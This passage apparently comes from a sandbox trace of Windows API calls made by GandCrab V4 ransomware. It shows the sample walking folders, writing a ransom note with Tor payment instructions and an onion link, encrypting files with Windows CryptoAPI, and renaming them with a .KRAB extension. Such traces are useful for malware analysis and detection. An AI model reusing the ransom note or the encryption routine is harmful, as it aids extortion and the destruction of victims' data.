(lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0083.947] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\KRAB-DECRYPT.txt" [0083.947] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0083.948] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\KRAB-DECRYPT.txt.KRAB") returned 119 [0083.948] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\KRAB-DECRYPT.txt") returned 114 [0083.948] lstrlenW (lpString=".txt") returned 4 [0083.948] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0083.948] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0083.948] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.949] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\KRAB-DECRYPT.txt") returned 114 [0083.949] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\KRAB-DECRYPT.txt") returned 114 [0083.949] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0083.949] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0083.949] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0083.949] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0083.949] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0083.949] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0083.949] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0083.949] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0083.949] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0083.949] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0083.949] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.949] FindNextFileW (in: hFindFile=0x10231f8, lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 1 [0083.949] lstrcmpW (lpString1="moz-safe-about+home", lpString2=".") returned 1 [0083.949] lstrcmpW (lpString1="moz-safe-about+home", lpString2="..") returned 1 [0083.950] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\", lpString2="moz-safe-about+home" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home" [0083.950] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\" [0083.950] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0083.950] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0083.950] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0083.950] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0083.950] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0083.950] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.950] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0083.951] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\\\KRAB-DECRYPT.txt") returned 135 [0083.951] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x72c [0083.953] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0083.953] WriteFile (in: hFile=0x72c, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338de20, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338de20*=0x1f6e, lpOverlapped=0x0) returned 1 [0083.954] CloseHandle (hObject=0x72c) returned 1 [0083.957] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.957] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0083.957] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x1f, wMilliseconds=0x97)) [0083.957] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0083.958] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0083.958] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0083.958] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\d2ca4a08d2ca4dee3d.lock") returned 141 [0083.958] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x72c [0083.960] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.960] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.960] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\") returned 118 [0083.960] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\*" [0083.961] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\*", lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 0x1023238 [0083.961] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.961] FindNextFileW (in: hFindFile=0x1023238, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0083.961] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.961] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.961] FindNextFileW (in: hFindFile=0x1023238, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0083.961] lstrcmpW (lpString1=".metadata", lpString2=".") returned 1 [0083.961] lstrcmpW (lpString1=".metadata", lpString2="..") returned 1 [0083.961] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\", lpString2=".metadata" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\.metadata") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\.metadata" [0083.961] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0083.961] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\.metadata.KRAB") returned 132 [0083.961] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\.metadata") returned 127 [0083.962] lstrlenW (lpString=".metadata") returned 9 [0083.962] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0083.962] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".metadata ") returned 10 [0083.962] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.962] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\.metadata") returned 127 [0083.962] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\.metadata") returned 127 [0083.962] lstrcmpiW (lpString1=".metadata", lpString2="desktop.ini") returned -1 [0083.962] lstrcmpiW (lpString1=".metadata", lpString2="autorun.inf") returned -1 [0083.962] lstrcmpiW (lpString1=".metadata", lpString2="ntuser.dat") returned -1 [0083.962] lstrcmpiW (lpString1=".metadata", lpString2="iconcache.db") returned -1 [0083.962] lstrcmpiW (lpString1=".metadata", lpString2="bootsect.bak") returned -1 [0083.963] lstrcmpiW (lpString1=".metadata", lpString2="boot.ini") returned -1 [0083.963] lstrcmpiW (lpString1=".metadata", lpString2="ntuser.dat.log") returned -1 [0083.963] lstrcmpiW (lpString1=".metadata", lpString2="thumbs.db") returned -1 [0083.963] lstrcmpiW (lpString1=".metadata", lpString2="KRAB-DECRYPT.html") returned -1 [0083.963] lstrcmpiW (lpString1=".metadata", lpString2="KRAB-DECRYPT.txt") returned -1 [0083.963] lstrcmpiW (lpString1=".metadata", lpString2="CRAB-DECRYPT.txt") returned -1 [0083.963] lstrcmpiW (lpString1=".metadata", lpString2="ntldr") returned -1 [0083.963] lstrcmpiW (lpString1=".metadata", lpString2="NTDETECT.COM") returned -1 [0083.964] lstrcmpiW (lpString1=".metadata", lpString2="Bootfont.bin") returned -1 [0083.964] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0083.964] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x1011898) returned 1 [0083.965] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0083.966] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0083.966] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0083.966] CryptGenRandom (in: hProv=0x1011898, dwLen=0x20, pbBuffer=0x338ddcc | out: pbBuffer=0x338ddcc) returned 1 [0083.966] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0083.966] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.966] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x1010e80) returned 1 [0083.968] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0083.968] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0083.969] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0083.969] CryptGenRandom (in: hProv=0x1010e80, dwLen=0x8, pbBuffer=0x338ddec | out: pbBuffer=0x338ddec) returned 1 [0083.969] CryptReleaseContext (hProv=0x1010e80, dwFlags=0x0) returned 1 [0083.969] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.969] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x10111b0) returned 1 [0083.971] CryptImportKey (in: hProv=0x10111b0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0x1022ff8) returned 1 [0083.971] CryptGetKeyParam (in: hKey=0x1022ff8, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0083.971] CryptEncrypt (in: hKey=0x1022ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0083.971] GetLastError () returned 0x0 [0083.971] CryptDestroyKey (hKey=0x1022ff8) returned 1 [0083.971] CryptReleaseContext (hProv=0x10111b0, dwFlags=0x0) returned 1 [0083.971] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x1010e80) returned 1 [0083.973] CryptImportKey (in: hProv=0x1010e80, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0x1023338) returned 1 [0083.973] CryptGetKeyParam (in: hKey=0x1023338, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0083.973] CryptEncrypt (in: hKey=0x1023338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0083.973] GetLastError () returned 0x0 [0083.973] CryptDestroyKey (hKey=0x1023338) returned 1 [0083.973] CryptReleaseContext (hProv=0x1010e80, dwFlags=0x0) returned 1 [0083.973] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\.metadata" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\.metadata"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7dc [0083.974] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0083.974] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0083.974] ReadFile (in: hFile=0x7dc, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ddfc*=0x2e, lpOverlapped=0x0) returned 1 [0083.989] SetFilePointerEx (in: hFile=0x7dc, liDistanceToMove=0xffffffd2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.989] WriteFile (in: hFile=0x7dc, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x2e, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ddf8*=0x2e, lpOverlapped=0x0) returned 1 [0083.989] WriteFile (in: hFile=0x7dc, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ddf8*=0x208, lpOverlapped=0x0) returned 1 [0083.989] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.993] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.994] CloseHandle (hObject=0x7dc) returned 1 [0083.994] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.994] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\.metadata" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\.metadata"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\.metadata.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\.metadata.krab")) returned 1 [0083.995] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.995] FindNextFileW (in: hFindFile=0x1023238, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0083.995] lstrcmpW (lpString1=".metadata-v2", lpString2=".") returned 1 [0083.995] lstrcmpW (lpString1=".metadata-v2", lpString2="..") returned 1 [0083.995] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\", lpString2=".metadata-v2" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\.metadata-v2") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\.metadata-v2" [0083.995] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0083.996] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\.metadata-v2.KRAB") returned 135 [0083.996] lstrlenW 